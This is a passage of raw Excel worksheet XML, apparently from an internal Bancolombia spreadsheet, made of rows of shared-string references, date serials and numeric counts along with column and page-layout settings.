      </c>
      <c r="L378" t="s">
        <v>83</v>
      </c>
      <c r="M378" t="s">
        <v>72</v>
      </c>
      <c r="Q378" t="s">
        <v>3627</v>
      </c>
      <c r="R378">
        <v>6585</v>
      </c>
      <c r="S378">
        <v>5885</v>
      </c>
      <c r="T378">
        <v>5914</v>
      </c>
      <c r="U378">
        <v>6081</v>
      </c>
      <c r="V378">
        <v>4798</v>
      </c>
      <c r="W378" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="379" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A379" t="s">
        <v>4</v>
      </c>
      <c r="B379">
        <v>44495.791363599536</v>
      </c>
      <c r="C379" t="s">
        <v>2865</v>
      </c>
      <c r="D379">
        <v>204</v>
      </c>
      <c r="E379" t="s">
        <v>2870</v>
      </c>
      <c r="F379">
        <v>202</v>
      </c>
      <c r="G379" t="s">
        <v>2874</v>
      </c>
      <c r="H379" t="s">
        <v>2872</v>
      </c>
      <c r="I379" t="s">
        <v>17</v>
      </c>
      <c r="J379" t="s">
        <v>1412</v>
      </c>
      <c r="K379" t="s">
        <v>17</v>
      </c>
      <c r="L379" t="s">
        <v>83</v>
      </c>
      <c r="M379" t="s">
        <v>72</v>
      </c>
      <c r="Q379" t="s">
        <v>3626</v>
      </c>
      <c r="R379">
        <v>165812</v>
      </c>
      <c r="S379">
        <v>873013</v>
      </c>
      <c r="T379">
        <v>1045252</v>
      </c>
      <c r="U379">
        <v>1095967</v>
      </c>
      <c r="V379">
        <v>1127387</v>
      </c>
      <c r="W379" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="380" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A380" t="s">
        <v>4</v>
      </c>
      <c r="B380">
        <v>44714.467278402779</v>
      </c>
      <c r="C380" t="s">
        <v>2598</v>
      </c>
      <c r="D380">
        <v>100</v>
      </c>
      <c r="E380" t="s">
        <v>2959</v>
      </c>
      <c r="F380">
        <v>100</v>
      </c>
      <c r="G380" t="s">
        <v>2960</v>
      </c>
      <c r="H380" t="s">
        <v>2965</v>
      </c>
      <c r="I380" t="s">
        <v>268</v>
      </c>
      <c r="J380" t="s">
        <v>269</v>
      </c>
      <c r="K380" t="s">
        <v>10</v>
      </c>
      <c r="L380" t="s">
        <v>77</v>
      </c>
      <c r="M380" t="s">
        <v>290</v>
      </c>
      <c r="N380" t="s">
        <v>291</v>
      </c>
      <c r="Q380" t="s">
        <v>1413</v>
      </c>
      <c r="R380">
        <v>40128175</v>
      </c>
      <c r="S380">
        <v>35134289</v>
      </c>
      <c r="T380">
        <v>38911106</v>
      </c>
      <c r="U380">
        <v>38660405</v>
      </c>
      <c r="V380">
        <v>44806196</v>
      </c>
      <c r="W380" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="381" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A381" t="s">
        <v>4</v>
      </c>
      <c r="B381">
        <v>44714.467278414355</v>
      </c>
      <c r="C381" t="s">
        <v>2598</v>
      </c>
      <c r="D381">
        <v>100</v>
      </c>
      <c r="E381" t="s">
        <v>2966</v>
      </c>
      <c r="F381">
        <v>100</v>
      </c>
      <c r="G381" t="s">
        <v>2967</v>
      </c>
      <c r="H381" t="s">
        <v>2968</v>
      </c>
      <c r="I381" t="s">
        <v>268</v>
      </c>
      <c r="J381" t="s">
        <v>269</v>
      </c>
      <c r="K381" t="s">
        <v>10</v>
      </c>
      <c r="L381" t="s">
        <v>77</v>
      </c>
      <c r="M381" t="s">
        <v>290</v>
      </c>
      <c r="N381" t="s">
        <v>291</v>
      </c>
      <c r="Q381" t="s">
        <v>1413</v>
      </c>
      <c r="R381">
        <v>100867</v>
      </c>
      <c r="S381">
        <v>142294</v>
      </c>
      <c r="T381">
        <v>130189</v>
      </c>
      <c r="U381">
        <v>262576</v>
      </c>
      <c r="V381">
        <v>806818</v>
      </c>
      <c r="W381" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="382" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A382" t="s">
        <v>4</v>
      </c>
      <c r="B382">
        <v>44714.470675266202</v>
      </c>
      <c r="C382" t="s">
        <v>3048</v>
      </c>
      <c r="D382">
        <v>100</v>
      </c>
      <c r="E382" t="s">
        <v>3049</v>
      </c>
      <c r="F382">
        <v>100</v>
      </c>
      <c r="G382" t="s">
        <v>3050</v>
      </c>
      <c r="H382" t="s">
        <v>1360</v>
      </c>
      <c r="I382" t="s">
        <v>268</v>
      </c>
      <c r="J382" t="s">
        <v>269</v>
      </c>
      <c r="K382" t="s">
        <v>10</v>
      </c>
      <c r="L382" t="s">
        <v>77</v>
      </c>
      <c r="M382" t="s">
        <v>290</v>
      </c>
      <c r="N382" t="s">
        <v>291</v>
      </c>
      <c r="Q382" t="s">
        <v>1413</v>
      </c>
      <c r="T382">
        <v>2</v>
      </c>
      <c r="U382">
        <v>753</v>
      </c>
      <c r="V382">
        <v>2127812</v>
      </c>
      <c r="W382" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="383" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A383" t="s">
        <v>4</v>
      </c>
      <c r="B383">
        <v>44292.085362627316</v>
      </c>
      <c r="C383" t="s">
        <v>3433</v>
      </c>
      <c r="D383">
        <v>106</v>
      </c>
      <c r="E383" t="s">
        <v>3434</v>
      </c>
      <c r="F383">
        <v>106</v>
      </c>
      <c r="G383" t="s">
        <v>3435</v>
      </c>
      <c r="H383" t="s">
        <v>1736</v>
      </c>
      <c r="I383" t="s">
        <v>31</v>
      </c>
      <c r="J383" t="s">
        <v>262</v>
      </c>
      <c r="K383" t="s">
        <v>31</v>
      </c>
      <c r="L383" t="s">
        <v>77</v>
      </c>
      <c r="M383" t="s">
        <v>262</v>
      </c>
      <c r="N383" t="s">
        <v>263</v>
      </c>
      <c r="Q383" t="s">
        <v>3628</v>
      </c>
      <c r="W383" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="384" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A384" t="s">
        <v>4</v>
      </c>
      <c r="B384">
        <v>44292.085362638885</v>
      </c>
      <c r="C384" t="s">
        <v>3433</v>
      </c>
      <c r="D384">
        <v>106</v>
      </c>
      <c r="E384" t="s">
        <v>3437</v>
      </c>
      <c r="F384">
        <v>106</v>
      </c>
      <c r="G384" t="s">
        <v>3438</v>
      </c>
      <c r="H384" t="s">
        <v>2395</v>
      </c>
      <c r="I384" t="s">
        <v>31</v>
      </c>
      <c r="J384" t="s">
        <v>262</v>
      </c>
      <c r="K384" t="s">
        <v>31</v>
      </c>
      <c r="L384" t="s">
        <v>77</v>
      </c>
      <c r="M384" t="s">
        <v>262</v>
      </c>
      <c r="N384" t="s">
        <v>263</v>
      </c>
      <c r="Q384" t="s">
        <v>3628</v>
      </c>
      <c r="W384" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="385" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A385" t="s">
        <v>4</v>
      </c>
      <c r="B385">
        <v>44292.08536261574</v>
      </c>
      <c r="C385" t="s">
        <v>3433</v>
      </c>
      <c r="D385">
        <v>106</v>
      </c>
      <c r="E385" t="s">
        <v>3440</v>
      </c>
      <c r="F385">
        <v>106</v>
      </c>
      <c r="G385" t="s">
        <v>3441</v>
      </c>
      <c r="H385" t="s">
        <v>2850</v>
      </c>
      <c r="I385" t="s">
        <v>31</v>
      </c>
      <c r="J385" t="s">
        <v>262</v>
      </c>
      <c r="K385" t="s">
        <v>31</v>
      </c>
      <c r="L385" t="s">
        <v>77</v>
      </c>
      <c r="M385" t="s">
        <v>262</v>
      </c>
      <c r="N385" t="s">
        <v>263</v>
      </c>
      <c r="Q385" t="s">
        <v>3628</v>
      </c>
      <c r="R385">
        <v>62</v>
      </c>
      <c r="S385">
        <v>71</v>
      </c>
      <c r="T385">
        <v>88</v>
      </c>
      <c r="U385">
        <v>49</v>
      </c>
      <c r="V385">
        <v>57</v>
      </c>
      <c r="W385" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="386" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A386" t="s">
        <v>4</v>
      </c>
      <c r="B386">
        <v>44250.648645960646</v>
      </c>
      <c r="C386" t="s">
        <v>3433</v>
      </c>
      <c r="D386">
        <v>106</v>
      </c>
      <c r="E386" t="s">
        <v>3442</v>
      </c>
      <c r="F386">
        <v>100</v>
      </c>
      <c r="G386" t="s">
        <v>3443</v>
      </c>
      <c r="H386" t="s">
        <v>3444</v>
      </c>
      <c r="I386" t="s">
        <v>31</v>
      </c>
      <c r="J386" t="s">
        <v>262</v>
      </c>
      <c r="K386" t="s">
        <v>31</v>
      </c>
      <c r="L386" t="s">
        <v>77</v>
      </c>
      <c r="M386" t="s">
        <v>262</v>
      </c>
      <c r="N386" t="s">
        <v>263</v>
      </c>
      <c r="Q386" t="s">
        <v>3628</v>
      </c>
      <c r="W386" t="s">
        <v>293</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="10" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawingHF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17CE0-CF67-4C6B-BA6B-E91EF377708A}">
  <sheetPr codeName="Hoja4"/>
  <dimension ref="A1:W204"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="12" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="33" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.6328125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="56.90625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="6.6328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="55.6328125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="27.90625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="33.36328125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.36328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="38.6328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="28.36328125" bestFit="1" customWidth="1"/>
    <col min="15" max="17" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="8.90625" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="7.54296875" bestFit="1" customWidth="1"/>
    <col min="20" max="22" width="9" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="24" max="25" width="9" bestFit="1" customWidth="1"/>
    <col min="26" max="27" width="13.90625" customWidth="1"/>
    <col min="28" max="28" width="19.90625" bestFit="1" customWidth="1"/>
    <col min="29" max="29" width="19.54296875" bestFit="1" customWidth="1"/>
    <col min="30" max="31" width="13.90625" customWidth="1"/>
    <col min="32" max="33" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="34" max="34" width="13.90625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>1</v>
      </c>
      <c r="B1" t="s">
        <v>51</v>
      </c>
      <c r="C1" t="s">
        <v>52</v>
      </c>
      <c r="D1" t="s">
        <v>53</v>
      </c>
      <c r="E1" t="s">
        <v>54</v>
      </c>
      <c r="F1" t="s">
        <v>55</v>
      </c>
      <c r="G1" t="s">
        <v>56</v>
      </c>
      <c r="H1" t="s">
        <v>57</v>
      </c>
      <c r="I1" t="s">
        <v>58</v>
      </c>
      <c r="J1" t="s">
        <v>59</v>
      </c>
      <c r="K1" t="s">
        <v>8</v>
      </c>
      <c r="L1" t="s">
        <v>60</v>
      </c>
      <c r="M1" t="s">
        <v>61</v>
      </c>
      <c r="N1" t="s">
        <v>62</v>
      </c>
      <c r="O1" t="s">
        <v>63</v>
      </c>
      <c r="P1" t="s">
        <v>64</v>
      </c>
      <c r="Q1" t="s">
        <v>65</v>
      </c>
      <c r="R1" t="s">
        <v>66</v>
      </c>
      <c r="S1" t="s">
        <v>67</v>
      </c>
      <c r="T1" t="s">
        <v>68</v>
      </c>
      <c r="U1" t="s">
        <v>69</v>
      </c>
      <c r="V1" t="s">
        <v>70</v>
      </c>
      <c r="W1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>3</v>
      </c>
      <c r="B2">
        <v>44314.160801215279</v>
      </c>
      <c r="C2" t="s">
        <v>297</v>
      </c>
      <c r="D2">
        <v>102</v>
      </c>
      <c r="E2" t="s">
        <v>298</v>
      </c>
      <c r="F2">
        <v>102</v>
      </c>
      <c r="G2" t="s">
        <v>299</v>
      </c>
      <c r="H2" t="s">
        <v>300</v>
      </c>
      <c r="I2" t="s">
        <v>156</v>
      </c>
      <c r="J2" t="s">
        <v>301</v>
      </c>
      <c r="K2" t="s">
        <v>38</v>
      </c>
      <c r="L2" t="s">
        <v>38</v>
      </c>
      <c r="M2" t="s">
        <v>38</v>
      </c>
      <c r="N2" t="s">
        <v>38</v>
      </c>
      <c r="P2" t="s">
        <v>302</v>
      </c>
      <c r="Q2" t="s">
        <v>3629</v>
      </c>
      <c r="W2" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>3</v>
      </c>
      <c r="B3">
        <v>44314.601553136577</v>
      </c>
      <c r="C3" t="s">
        <v>297</v>
      </c>
      <c r="D3">
        <v>202</v>
      </c>
      <c r="E3" t="s">
        <v>298</v>
      </c>
      <c r="F3">
        <v>202</v>
      </c>
      <c r="G3" t="s">
        <v>299</v>
      </c>
      <c r="H3" t="s">
        <v>305</v>
      </c>
      <c r="I3" t="s">
        <v>156</v>
      </c>
      <c r="J3" t="s">
        <v>301</v>
      </c>
      <c r="K3" t="s">
        <v>38</v>
      </c>
      <c r="L3" t="s">
        <v>38</v>
      </c>
      <c r="M3" t="s">
        <v>38</v>
      </c>
      <c r="N3" t="s">
        <v>38</v>
      </c>
      <c r="P3" t="s">
        <v>302</v>
      </c>
      <c r="Q3" t="s">
        <v>3630</v>
      </c>
      <c r="R3">
        <v>939414</v>
      </c>
      <c r="S3">
        <v>768053</v>
      </c>
      <c r="T3">
        <v>2040383</v>
      </c>
      <c r="U3">
        <v>4058637</v>
      </c>
      <c r="V3">
        <v>8844910</v>
      </c>
      <c r="W3" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>3</v>
      </c>
      <c r="B4">
        <v>43161.686450138892</v>
      </c>
      <c r="C4" t="s">
        <v>524</v>
      </c>
      <c r="D4">
        <v>100</v>
      </c>
      <c r="E4" t="s">
        <v>525</v>
      </c>
      <c r="F4">
        <v>100</v>
      </c>
      <c r="G4" t="s">
        <v>526</v>
      </c>
      <c r="H4" t="s">
        <v>527</v>
      </c>
      <c r="I4" t="s">
        <v>528</v>
      </c>
      <c r="J4" t="s">
        <v>529</v>
      </c>
      <c r="K4" t="s">
        <v>39</v>
      </c>
      <c r="L4" t="s">
        <v>83</v>
      </c>
      <c r="M4" t="s">
        <v>72</v>
      </c>
      <c r="P4" t="s">
        <v>530</v>
      </c>
      <c r="Q4" t="s">
        <v>3631</v>
      </c>
      <c r="R4">
        <v>20028</v>
      </c>
      <c r="S4">
        <v>16725</v>
      </c>
      <c r="T4">
        <v>41850</v>
      </c>
      <c r="U4">
        <v>76931</v>
      </c>
      <c r="V4">
        <v>70855</v>
      </c>
      <c r="W4" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>3</v>
      </c>
      <c r="B5">
        <v>43714.759844074077</v>
      </c>
      <c r="C5" t="s">
        <v>1667</v>
      </c>
      <c r="D5">
        <v>100</v>
      </c>
      <c r="E5" t="s">
        <v>1668</v>
      </c>
      <c r="F5">
        <v>100</v>
      </c>
      <c r="G5" t="s">
        <v>1669</v>
      </c>
      <c r="H5" t="s">
        <v>1670</v>
      </c>
      <c r="I5" t="s">
        <v>31</v>
      </c>
      <c r="J5" t="s">
        <v>262</v>
      </c>
      <c r="K5" t="s">
        <v>31</v>
      </c>
      <c r="L5" t="s">
        <v>77</v>
      </c>
      <c r="M5" t="s">
        <v>262</v>
      </c>
      <c r="N5" t="s">
        <v>263</v>
      </c>
      <c r="Q5" t="s">
        <v>3632</v>
      </c>
      <c r="W5" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>3</v>
      </c>
      <c r="B6">
        <v>43763.442818055555</v>
      </c>
      <c r="C6" t="s">
        <v>2142</v>
      </c>
      <c r="D6">
        <v>101</v>
      </c>
      <c r="E6" t="s">
        <v>2143</v>
      </c>
      <c r="F6">
        <v>101</v>
      </c>
      <c r="G6" t="s">
        <v>1672</v>
      </c>
      <c r="H6" t="s">
        <v>2144</v>
      </c>
      <c r="I6" t="s">
        <v>31</v>
      </c>
      <c r="J6" t="s">
        <v>262</v>
      </c>
      <c r="K6" t="s">
        <v>31</v>
      </c>
      <c r="L6" t="s">
        <v>77</v>
      </c>
      <c r="M6" t="s">
        <v>262</v>
      </c>
      <c r="N6" t="s">
        <v>263</v>
      </c>
      <c r="O6" t="s">
        <v>111</v>
      </c>
      <c r="Q6" t="s">
        <v>161</v>
      </c>
      <c r="W6" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>3</v>
      </c>
      <c r="B7">
        <v>44184.075663888892</v>
      </c>
      <c r="C7" t="s">
        <v>2309</v>
      </c>
      <c r="D7">
        <v>100</v>
      </c>
      <c r="E7" t="s">
        <v>2310</v>
      </c>
      <c r="F7">
        <v>100</v>
      </c>
      <c r="G7" t="s">
        <v>2311</v>
      </c>
      <c r="H7" t="s">
        <v>2296</v>
      </c>
      <c r="I7" t="s">
        <v>203</v>
      </c>
      <c r="J7" t="s">
        <v>204</v>
      </c>
      <c r="K7" t="s">
        <v>24</v>
      </c>
      <c r="L7" t="s">
        <v>83</v>
      </c>
      <c r="M7" t="s">
        <v>72</v>
      </c>
      <c r="Q7" t="s">
        <v>161</v>
      </c>
      <c r="W7" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>3</v>
      </c>
      <c r="B8">
        <v>43481.669218506948</v>
      </c>
      <c r="C8" t="s">
        <v>2598</v>
      </c>
      <c r="D8">
        <v>111</v>
      </c>
      <c r="E8" t="s">
        <v>2599</v>
      </c>
      <c r="F8">
        <v>102</v>
      </c>
      <c r="G8" t="s">
        <v>2600</v>
      </c>
      <c r="H8" t="s">
        <v>1074</v>
      </c>
      <c r="I8" t="s">
        <v>185</v>
      </c>
      <c r="J8" t="s">
        <v>186</v>
      </c>
      <c r="K8" t="s">
        <v>16</v>
      </c>
      <c r="L8" t="s">
        <v>83</v>
      </c>
      <c r="M8" t="s">
        <v>72</v>
      </c>
      <c r="O8" t="s">
        <v>2601</v>
      </c>
      <c r="Q8" t="s">
        <v>3633</v>
      </c>
      <c r="W8" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>3</v>
      </c>
      <c r="B9">
        <v>43481.669218483796</v>
      </c>
      <c r="C9" t="s">
        <v>2598</v>
      </c>
      <c r="D9">
        <v>111</v>
      </c>
      <c r="E9" t="s">
        <v>2603</v>
      </c>
      <c r="F9">
        <v>100</v>
      </c>
      <c r="G9" t="s">
        <v>2604</v>
      </c>
      <c r="H9" t="s">
        <v>2605</v>
      </c>
      <c r="I9" t="s">
        <v>210</v>
      </c>
      <c r="J9" t="s">
        <v>211</v>
      </c>
      <c r="K9" t="s">
        <v>30</v>
      </c>
      <c r="L9" t="s">
        <v>83</v>
      </c>
      <c r="M9" t="s">
        <v>72</v>
      </c>
      <c r="O9" t="s">
        <v>2601</v>
      </c>
      <c r="Q9" t="s">
        <v>3633</v>
      </c>
      <c r="W9" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>3</v>
      </c>
      <c r="B10">
        <v>43756.642468449078</v>
      </c>
      <c r="C10" t="s">
        <v>2598</v>
      </c>
      <c r="D10">
        <v>202</v>
      </c>
      <c r="E10" t="s">
        <v>2978</v>
      </c>
      <c r="F10">
        <v>201</v>
      </c>
      <c r="G10" t="s">
        <v>2600</v>
      </c>
      <c r="H10" t="s">
        <v>2979</v>
      </c>
      <c r="I10" t="s">
        <v>185</v>
      </c>
      <c r="J10" t="s">
        <v>186</v>
      </c>
      <c r="K10" t="s">
        <v>16</v>
      </c>
      <c r="L10" t="s">
        <v>83</v>
      </c>
      <c r="M10" t="s">
        <v>72</v>
      </c>
      <c r="O10" t="s">
        <v>2601</v>
      </c>
      <c r="P10" t="s">
        <v>1795</v>
      </c>
      <c r="Q10" t="s">
        <v>3634</v>
      </c>
      <c r="W10" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>3</v>
      </c>
      <c r="B11">
        <v>43760.624119189815</v>
      </c>
      <c r="C11" t="s">
        <v>2598</v>
      </c>
      <c r="D11">
        <v>202</v>
      </c>
      <c r="E11" t="s">
        <v>2981</v>
      </c>
      <c r="F11">
        <v>101</v>
      </c>
      <c r="G11" t="s">
        <v>2604</v>
      </c>
      <c r="H11" t="s">
        <v>2605</v>
      </c>
      <c r="I11" t="s">
        <v>210</v>
      </c>
      <c r="J11" t="s">
        <v>211</v>
      </c>
      <c r="K11" t="s">
        <v>30</v>
      </c>
      <c r="L11" t="s">
        <v>83</v>
      </c>
      <c r="M11" t="s">
        <v>72</v>
      </c>
      <c r="Q11" t="s">
        <v>3634</v>
      </c>
      <c r="W11" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>3</v>
      </c>
      <c r="B12">
        <v>43020.819557442126</v>
      </c>
      <c r="C12" t="s">
        <v>2598</v>
      </c>
      <c r="D12">
        <v>111</v>
      </c>
      <c r="E12" t="s">
        <v>3371</v>
      </c>
      <c r="F12">
        <v>100</v>
      </c>
      <c r="G12" t="s">
        <v>3372</v>
      </c>
      <c r="H12" t="s">
        <v>3373</v>
      </c>
      <c r="I12" t="s">
        <v>185</v>
      </c>
      <c r="J12" t="s">
        <v>186</v>
      </c>
      <c r="K12" t="s">
        <v>16</v>
      </c>
      <c r="L12" t="s">
        <v>83</v>
      </c>
      <c r="M12" t="s">
        <v>72</v>
      </c>
      <c r="O12" t="s">
        <v>2601</v>
      </c>
      <c r="Q12" t="s">
        <v>3633</v>
      </c>
      <c r="W12" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>3</v>
      </c>
      <c r="B13">
        <v>43790.925171168979</v>
      </c>
      <c r="C13" t="s">
        <v>3433</v>
      </c>
      <c r="D13">
        <v>104</v>
      </c>
      <c r="E13" t="s">
        <v>3434</v>
      </c>
      <c r="F13">
        <v>104</v>
      </c>
      <c r="G13" t="s">
        <v>3435</v>
      </c>
      <c r="H13" t="s">
        <v>1736</v>
      </c>
      <c r="I13" t="s">
        <v>31</v>
      </c>
      <c r="J13" t="s">
        <v>262</v>
      </c>
      <c r="K13" t="s">
        <v>31</v>
      </c>
      <c r="L13" t="s">
        <v>77</v>
      </c>
      <c r="M13" t="s">
        <v>262</v>
      </c>
      <c r="N13" t="s">
        <v>263</v>
      </c>
      <c r="Q13" t="s">
        <v>3632</v>
      </c>
      <c r="T13">
        <v>5247</v>
      </c>
      <c r="U13">
        <v>7617</v>
      </c>
      <c r="W13" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>3</v>
      </c>
      <c r="B14">
        <v>43790.925171180555</v>
      </c>
      <c r="C14" t="s">
        <v>3433</v>
      </c>
      <c r="D14">
        <v>104</v>
      </c>
      <c r="E14" t="s">
        <v>3437</v>
      </c>
      <c r="F14">
        <v>104</v>
      </c>
      <c r="G14" t="s">
        <v>3438</v>
      </c>
      <c r="H14" t="s">
        <v>3439</v>
      </c>
      <c r="I14" t="s">
        <v>31</v>
      </c>
      <c r="J14" t="s">
        <v>262</v>
      </c>
      <c r="K14" t="s">
        <v>31</v>
      </c>
      <c r="L14" t="s">
        <v>77</v>
      </c>
      <c r="M14" t="s">
        <v>262</v>
      </c>
      <c r="N14" t="s">
        <v>263</v>
      </c>
      <c r="Q14" t="s">
        <v>3632</v>
      </c>
      <c r="T14">
        <v>4919</v>
      </c>
      <c r="U14">
        <v>7610</v>
      </c>
      <c r="W14" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>3</v>
      </c>
      <c r="B15">
        <v>43790.925171145835</v>
      </c>
      <c r="C15" t="s">
        <v>3433</v>
      </c>
      <c r="D15">
        <v>104</v>
      </c>
      <c r="E15" t="s">
        <v>3440</v>
      </c>
      <c r="F15">
        <v>104</v>
      </c>
      <c r="G15" t="s">
        <v>3441</v>
      </c>
      <c r="H15" t="s">
        <v>2850</v>
      </c>
      <c r="I15" t="s">
        <v>31</v>
      </c>
      <c r="J15" t="s">
        <v>262</v>
      </c>
      <c r="K15" t="s">
        <v>31</v>
      </c>
      <c r="L15" t="s">
        <v>77</v>
      </c>
      <c r="M15" t="s">
        <v>262</v>
      </c>
      <c r="N15" t="s">
        <v>263</v>
      </c>
      <c r="Q15" t="s">
        <v>3632</v>
      </c>
      <c r="T15">
        <v>4917</v>
      </c>
      <c r="U15">
        <v>7617</v>
      </c>
      <c r="W15" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>3</v>
      </c>
      <c r="B16">
        <v>44326.92819885417</v>
      </c>
      <c r="C16" t="s">
        <v>86</v>
      </c>
      <c r="D16">
        <v>130</v>
      </c>
      <c r="E16" t="s">
        <v>100</v>
      </c>
      <c r="F16">
        <v>110</v>
      </c>
      <c r="G16" t="s">
        <v>101</v>
      </c>
      <c r="H16" t="s">
        <v>102</v>
      </c>
      <c r="I16" t="s">
        <v>103</v>
      </c>
      <c r="J16" t="s">
        <v>104</v>
      </c>
      <c r="K16" t="s">
        <v>19</v>
      </c>
      <c r="L16" t="s">
        <v>77</v>
      </c>
      <c r="M16" t="s">
        <v>104</v>
      </c>
      <c r="O16" t="s">
        <v>105</v>
      </c>
      <c r="Q16" t="s">
        <v>3635</v>
      </c>
      <c r="R16">
        <v>1477</v>
      </c>
      <c r="S16">
        <v>5</v>
      </c>
      <c r="W16" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="17" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>3</v>
      </c>
      <c r="B17">
        <v>43656.052061863425</v>
      </c>
      <c r="C17" t="s">
        <v>86</v>
      </c>
      <c r="D17">
        <v>130</v>
      </c>
      <c r="E17" t="s">
        <v>115</v>
      </c>
      <c r="F17">
        <v>112</v>
      </c>
      <c r="G17" t="s">
        <v>116</v>
      </c>
      <c r="H17" t="s">
        <v>117</v>
      </c>
      <c r="I17" t="s">
        <v>103</v>
      </c>
      <c r="J17" t="s">
        <v>104</v>
      </c>
      <c r="K17" t="s">
        <v>19</v>
      </c>
      <c r="L17" t="s">
        <v>77</v>
      </c>
      <c r="M17" t="s">
        <v>104</v>
      </c>
      <c r="P17" t="s">
        <v>93</v>
      </c>
      <c r="Q17" t="s">
        <v>3635</v>
      </c>
      <c r="R17">
        <v>698</v>
      </c>
      <c r="S17">
        <v>1</v>
      </c>
      <c r="W17" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="18" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>3</v>
      </c>
      <c r="B18">
        <v>44327.74064265046</v>
      </c>
      <c r="C18" t="s">
        <v>137</v>
      </c>
      <c r="D18">
        <v>110</v>
      </c>
      <c r="E18" t="s">
        <v>138</v>
      </c>
      <c r="F18">
        <v>110</v>
      </c>
      <c r="G18" t="s">
        <v>139</v>
      </c>
      <c r="H18" t="s">
        <v>140</v>
      </c>
      <c r="I18" t="s">
        <v>103</v>
      </c>
      <c r="J18" t="s">
        <v>104</v>
      </c>
      <c r="K18" t="s">
        <v>19</v>
      </c>
      <c r="L18" t="s">
        <v>77</v>
      </c>
      <c r="M18" t="s">
        <v>104</v>
      </c>
      <c r="O18" t="s">
        <v>141</v>
      </c>
      <c r="Q18" t="s">
        <v>142</v>
      </c>
      <c r="W18" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="19" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>3</v>
      </c>
      <c r="B19">
        <v>43665.050422777778</v>
      </c>
